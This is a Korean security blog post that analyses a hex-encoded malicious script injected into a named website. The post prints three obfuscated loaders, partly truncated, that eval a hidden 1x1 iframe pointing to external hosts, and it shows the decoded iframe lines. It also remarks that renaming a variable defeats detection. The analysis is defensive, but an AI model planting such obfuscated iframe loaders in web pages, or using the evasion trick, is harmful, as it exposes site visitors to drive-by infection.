본문 바로가기

security/악성코드 유포

HEX 값으로 유포하는 악성 Iframe Script

발견지 : http://integridesign.com/David/index.php?target=contact

* 위 페이지 접속시 악성스크립트에 감염 될 수도 있습니다!


위와같이 사이트 접속시 정상 스크립트 내에 이와같이 알수 없는 문구들로 이어진 스크립트를 발견 할 수 있습니다!


</body>

</HTML>

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f766e627

57974612e636f2e62652f666f72756d2e7068703f74703d3637356561666563343331623166373222207

7696474683d223122206865696768743d223122206672616d65626f726465723d223

[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65

726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d363735656166656334333162316

63732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223

e3c[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6c6f63

756d7265736f75726365732e636f6d2f666f72756d2e7068703f74703d3637356561666563343331623

1663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230

223e[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


잠깐 확인을 해보자면 이 코드는 간단하다.

 "var t" 로 지정되어있는 값이 String.fromCharCode 거쳐 eval 함수에서 출력이 된다 !

알수 없이 이어진 숫자들은 바로 16진수 HEX 코드이다.

HEX 코드를 다시 문자열로 변환하는 방법은 아스키 코드표를 보면 쉽게 스크립트가 어디로 연결 되어 있는지를 볼 수 있다 !


Decode 를 해보면 연결되는 사이트는 다음과 같다 !


document.write('<iframe src="http://vnbuyta.co.be/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


해당 사이트들은 현재 접속이 되고 있지 않다 !


하지만 스크립트를 보면서 조금만 문구를 변경하여도 못잡는것이 마음이 안타까웠다.....

문구를 var t -> var x 로 바꾸면 진단 못하는게 너무 허무하기도 하고 안타깝기도 했다.

역시 최선은 사용자가 접속하기 전에 미리 차단을 해버리는것이 제일 사용자를 지키는 일인거 같다!